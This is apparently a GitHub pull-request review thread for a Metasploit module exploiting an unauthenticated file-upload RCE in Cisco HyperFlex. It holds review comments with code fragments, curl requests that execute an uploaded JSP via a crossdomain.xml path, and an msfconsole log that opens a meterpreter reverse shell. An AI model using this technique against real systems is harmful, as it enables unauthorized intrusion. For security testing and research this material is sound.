Cisco HyperFlex File Upload RCE
rapid7/metasploit-framework pull request #15333
Opened 2021-06-11 21:09 UTC by jheysel-r7

Not ready, don't look at me

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!

Specific Hardware Examples:
* Switches
* Routers
* IP Cameras
* IoT devices

Complex Software Examples:
* Expensive proprietary software
* Software with an extensive installation process
* Software that requires exploit testing across multiple significantly different versions
* Software without an English language UI

We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.

2021-06-14 22:24 UTC, jmartin-r7 commented
@msjenkins-r7 test this please.

2021-06-15 13:16 UTC, smcintyre-r7 requested changes
Just left a few comments. If this is ready, I can move on to testing it once they're addressed. Looks good overall, nice work @jheysel-r7 !

2021-06-15 13:16 UTC, smcintyre-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
This looks like it was copied over from the `exploits/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec` module, but I don't see it referenced anywhere so it looks safe to remove?

2021-06-15 13:16 UTC, smcintyre-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      exit
I think this is calling the Ruby builtin `exit` function? At least I can't seem to find where else it may be defined. In that case, we probably don't want the whole framework exiting. You should be able to update this to just `return` (though there's nothing else in the function body so even that isn't really necessary. If you really want the module to stop running if this condition is present, you can use `fail_with(Failure::UnexpectedReply ...`.

2021-06-15 13:16 UTC, smcintyre-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      return Exploit::CheckCode::Appears
Is there any additional request, maybe to another resource or something that could be used to verify the HyperFlex service is running?

2021-06-15 13:16 UTC, smcintyre-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      OptString.new('UPLOAD_FILE_NAME', [false, 'Choose a filename for the payload. (Default is random)', rand_text_alpha(rand(8..15))])
This option is missing from the module docs. It would be helpful to have a bit of detail about what it is, and how it's used in the exploit.

2021-06-15 18:58 UTC, jheysel-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
Yup, guilty as charged. Removed 👍

2021-06-15 18:58 UTC, jheysel-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      exit
Oopsie, good catch, definitely don't want to be exiting the whole framework.

I think it would make sense to: `fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code} when attempting to upload the payload")`, as directly after we attempt to upload, we attempt to execute the payload. If we know it didn't upload successfully, I don't think we'd want to attempt to execute.

2021-06-15 18:59 UTC, jheysel-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      return Exploit::CheckCode::Appears
I've pushed some changes to check the body of the homepage behind SSL for a unique Cisco HyperFlex indicator.  

Not certain if I implemented this correctly - before this check the module was not using SSL / hitting port `443`. 
I manually edited the `datastore` variables; `RPORT` and `SSL` and manually switched them back to their original values after running the check. 

Please let me know if there's a better way do to this.

2021-06-15 18:59 UTC, jheysel-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      OptString.new('UPLOAD_FILE_NAME', [false, 'Choose a filename for the payload. (Default is random)', rand_text_alpha(rand(8..15))])
Thanks for pointing that out! Missed that, docs updated.
```
**UPLOAD_FILE_NAME**
This is the name of the .jsp file that is packaged inside the .war payload. The .jsp file is auto deployed on the tomcat
server and is then invoked via a GET request in order to execute the payload. (Random by default).
```

2021-06-15 19:48 UTC, jheysel-r7 commented
@smcintyre-r7 Thanks for the review, much appreciated! Before wvu left for vacation they reminded me that we have native Java payloads. Wondering what your opinion is on switching from `linux/x64/meterpreter_reverse_tcp` to a native java payload?

2021-06-15 23:06 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      exit
Framework will catch it, but `fail_with` is the correct approach.

2021-06-15 23:15 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      return Exploit::CheckCode::Appears
You can pass options to `send_request_*`.

2021-06-15 23:18 UTC, wvu-r7 commented on documentation/modules/exploit/linux/http/cisco_hyperflex_file_upload_rce.md
> +commands as the Tomcat user
> to execute shell commands

🤔

2021-06-15 23:18 UTC, wvu-r7 commented on documentation/modules/exploit/linux/http/cisco_hyperflex_file_upload_rce.md
> +**UPLOAD_FILE_NAME**
```suggestion
## Options

### UPLOAD_FILE_NAME
```

2021-06-15 23:23 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +        # 'Arch' => [ARCH_CMD, ARCH_JAVA],
🤔

2021-06-15 23:25 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +                'WfsDelay' => 10
Cause and effect? Stageless is _big_.

2021-06-15 23:31 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
```suggestion
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
```

Maybe, since you're overriding an nginx location and potentially registering a new Tomcat application.

2021-06-15 23:34 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +    unless res_ssl.body[%r{<title>Hyperflex Installer</title>|<title>Cisco HyperFlex Connect</title>}]
I think you can simplify your alternation.

2021-06-15 23:35 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +    if res && res.code == 400 && res.headers['Server'][/nginx/i] && res.body[/Apache Tomcat/]
I'm not sure this is `nil`-safe.

2021-06-15 23:36 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      return Exploit::CheckCode::Safe
```suggestion
      return CheckCode::Safe
```

2021-06-15 23:36 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      return Exploit::CheckCode::Appears
```suggestion
      return CheckCode::Appears
```

2021-06-15 23:37 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      return Exploit::CheckCode::Safe
```suggestion
      return CheckCode::Safe
```

2021-06-15 23:40 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code} when attempting to upload the payload")
`res` can be `nil` here.

2021-06-15 23:41 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      exit
You forgot one.

2021-06-15 23:41 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +    sleep(datastore['WfsDelay'])
Is this necessary?

2021-06-15 23:44 UTC, wvu-r7 requested changes
Congrats on another module! Overall good job. Bye.

2021-06-15 23:57 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +    app_base = 'crossdomain.xml'
FWIW, there are more discreet options that work with a Java payload.

2021-06-16 16:26 UTC, jheysel-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +      return Exploit::CheckCode::Appears
What was I thinking, thanks, that makes sense.

2021-06-16 16:38 UTC, jheysel-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +    sleep(datastore['WfsDelay'])
It seems to work more consistently with this here. I've tested with it removed, and it works but not every time. 

I think this could be due to the time it takes for the .war file to get deployed. We receive the response from the upload attempt and if successful we continue execution.  Quite soon after we attempt to call the newly deployed .jsp file, if it's not there yet we fail.

2021-06-16 16:40 UTC, jheysel-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +                'WfsDelay' => 10
This was an oversight on my part, although when trying to switch to a staged payload I wasn't receiving a shell. I'll investigate further if we decide to stick with the `linux/x64/meterpreter`

2021-06-16 18:38 UTC, jheysel-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +    app_base = 'crossdomain.xml'
I assume I need to find a payload that returns a shell automatically when it deploys itself in the `tomcat7/webapps/` directory? That would remove the need to name the war file `crossdomain.xml.war`

I named the directory `crossdomain.xml` due to the nginx configuration - if named anything else I don't think I'm able to execute what's inside as I get a 301.

Success when named directory named `crossdomain.xml`:
```
➜  metasploit-framework git:(hyperflex_file_upload_rce) ✗ curl -v http://192.168.123.145/crossdomain.xml/pngynhbplt.jsp
*   Trying 192.168.123.145...
* TCP_NODELAY set
* Connected to 192.168.123.145 (192.168.123.145) port 80 (#0)
> GET /crossdomain.xml/pngynhbplt.jsp HTTP/1.1
> Host: 192.168.123.145
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Wed, 16 Jun 2021 18:07:29 GMT
< Content-Type: text/html;charset=ISO-8859-1
< Content-Length: 6
< Connection: keep-alive
< Set-Cookie: JSESSIONID=9EDC41FB32DB4C8E66FDF87833703789; Path=/crossdomain.xml/; HttpOnly
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<






* Connection #0 to host 192.168.123.145 left intact
* Closing connection 0
```

Unsuccessful when named something else:
```
➜  metasploit-framework git:(hyperflex_file_upload_rce) ✗ curl -v http://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp
*   Trying 192.168.123.145...
* TCP_NODELAY set
* Connected to 192.168.123.145 (192.168.123.145) port 80 (#0)
> GET /jsp_shell_reverse_tcp/pngynhbplt.jsp HTTP/1.1
> Host: 192.168.123.145
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.8.1
< Date: Wed, 16 Jun 2021 18:06:17 GMT
< Content-Type: text/html
< Content-Length: 184
< Connection: keep-alive
< Location: https://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.8.1</center>
</body>
</html>
* Connection #0 to host 192.168.123.145 left intact
* Closing connection 0
```

I've tried the following java payloads:
```
java/meterpreter/reverse_tcp
java/jsp_shell_reverse_tcp
java/shell_reverse_tcp
```
and am unable to get a shell without naming the directory `crossdomain.xml` . 
I might be making an incorrect assumption with regards to how need to execute the payload once uploaded.

2021-06-17 14:06 UTC, jmartin-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +    register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml/')
Is a way to change the name as discussed [here](https://github.com/rapid7/metasploit-framework/pull/15333/files#r652951821) is found this will need to account for it.

2021-06-17 15:21 UTC, jheysel-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +    register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml/')
After thorough testing I haven't been able to find a way to change the name of the file while still being able to execute it.  I think these will stay as is.

2021-06-17 16:57 UTC, smcintyre-r7 approved these changes

2021-06-17 17:40 UTC, smcintyre-r7 commented
Just tested this one last time and confirmed it's working as intended. I tested both targets and the Linux dropper with both a staged and unstaged payload. Both did work, but the unstaged payload does seem slightly more reliable. Since that's the default value, it seems fine.

```
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > show options 

Module options (exploit/linux/http/cisco_hyperflex_file_upload_rce):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.159.250  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Base path
   UPLOAD_FILE_NAME  DUCZwPtoIjHhLt   no        Choose a filename for the payload. (Default is random)
   VHOST                              no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set PAYLOAD linux/x64/meterpreter_reverse_tcp 
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... calling: /crossdomain.xml/DUCZwPtoIjHhLt.jsp
[+] Payload executed successfully
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.250:44834) at 2021-06-17 13:38:37 -0400
[!] This exploit may require manual cleanup of '/var/lib/tomcat7/crossdomain.xml.war' on the target
[!] This exploit may require manual cleanup of '/var/lib/tomcat7/crossdomain.xml/' on the target

meterpreter > getuid
Server username: tomcat7 @ HyperFlex-Installer-4.0.2d (uid=111, gid=114, euid=111, egid=114)
meterpreter > sysinfo
Computer     : HyperFlex-Installer-4.0.2d
OS           : Ubuntu 16.04 (Linux 4.4.0-75-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

I'll have this landed in a moment, thanks @jheysel-r7 !

2021-06-17 17:40 UTC, merged

2021-06-17 17:41 UTC, smcintyre-r7 commented
# Release Notes

This adds an exploit module targeting a file upload vulnerability within the Cisco Hyperflex application that can be used to obtain unauthenticated remote code execution.

2021-06-18 02:07 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +    sleep(datastore['WfsDelay'])
https://github.com/rapid7/metasploit-framework/pull/15333#discussion_r652226525

2021-06-18 02:13 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +    app_base = 'crossdomain.xml'
There are other nginx locations that work. I was using a payload servlet. Maybe we can go over the different approaches when I come back. :)

2021-06-18 02:16 UTC, wvu-r7 commented
Excellent effort on this, @jheysel-r7. :)

2021-07-30 18:35 UTC, wvu-r7 commented on modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
> +    register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml/')
FYI, these paths are incorrect, and `register_dir_for_cleanup` is preferred.